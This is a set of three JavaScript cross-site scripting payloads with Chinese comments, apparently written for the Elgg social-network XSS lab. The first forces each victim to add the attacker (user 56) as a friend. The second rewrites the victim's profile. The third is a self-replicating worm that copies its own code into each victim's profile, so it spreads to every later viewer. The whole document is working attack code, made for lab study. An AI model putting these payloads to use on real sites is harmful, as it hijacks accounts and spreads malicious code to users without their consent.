<script type="text/javascript">
    window.onload = () => {
        var Ajax = null;
        // 获取__elgg_ts这个参数
        var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
        var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
        // Alice的friend ID 为56
        var sendurl = "../action/friends/add?friend=56" + ts + token;
        // 创建一个XMLHttpRequest对象
       Ajax = new XMLHttpRequest();
       // 初始化http请求参数，但是不发送请求
       // 要发送的url是以当前页面为标准的，也就是不用写host（域名），直接写资源路径即可。
       Ajax.open('GET', sendurl, true)
       // 发送http请求
       Ajax.send()
    }
</script>


<script type="text/javascript">
    window.onload = () => {
       // 获取必备的参数
       var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
       var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
       var guid = "&guid=" + elgg.session.user.guid;
        // post要发送的数据
       var content = "briefdescription=tengfei is my hero" + ts + token + guid;
       // 攻击者的guid
       var aliceGuid = 56;
        // 判断是否为自身
       if (elgg.session.user.guid != aliceGuid) {
           var Ajax = null;
           Ajax = new XMLHttpRequest();
           // 先建立连接，不发送数据。
           Ajax.open('POST', '../action/profile/edit', true);
           // 设置请求头来规定所发送数据的格式
           Ajax.setRequestHeader('Content-Type',
                                 'application/x-www-form-urlencoded');
            // 发送post数据
           Ajax.send(content);
       }
    }
</script>

<script id="worm">
    window.onload = () => {
        // 构造标签,注意区分开“\”和“/”
        var headerTag = "<script id=\"worm\" type=\"text/javascript\">";
        var tailTag = "</" + "script>";
        // 获取js代码内容
        var jsCode = document.getElementById('worm').innerHTML;
        // 进行URL编码，与后边我们设置的Content-type格式一致。
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);


       // 获取必备的参数
       var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
       var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
       var guid = "&guid=" + elgg.session.user.guid;
       var aboutme = "&description=" + wormCode;


        // post要发送的数据
       var content = "briefdescription=tengfei is my hero" + ts + token + guid + aboutme;
       // 攻击者的guid
       var aliceGuid = 56;
        // 判断是否为攻击者本身
       if (elgg.session.user.guid != aliceGuid) {
           var Ajax = null;
           Ajax = new XMLHttpRequest();
           // 先建立连接，不发送数据。
           Ajax.open('POST', '../action/profile/edit', true);
           // 设置请求头来规定所发送数据的格式
           Ajax.setRequestHeader('Content-Type',
                                 'application/x-www-form-urlencoded');
            // 发送post数据
           Ajax.send(content);
       }
    }
</script>
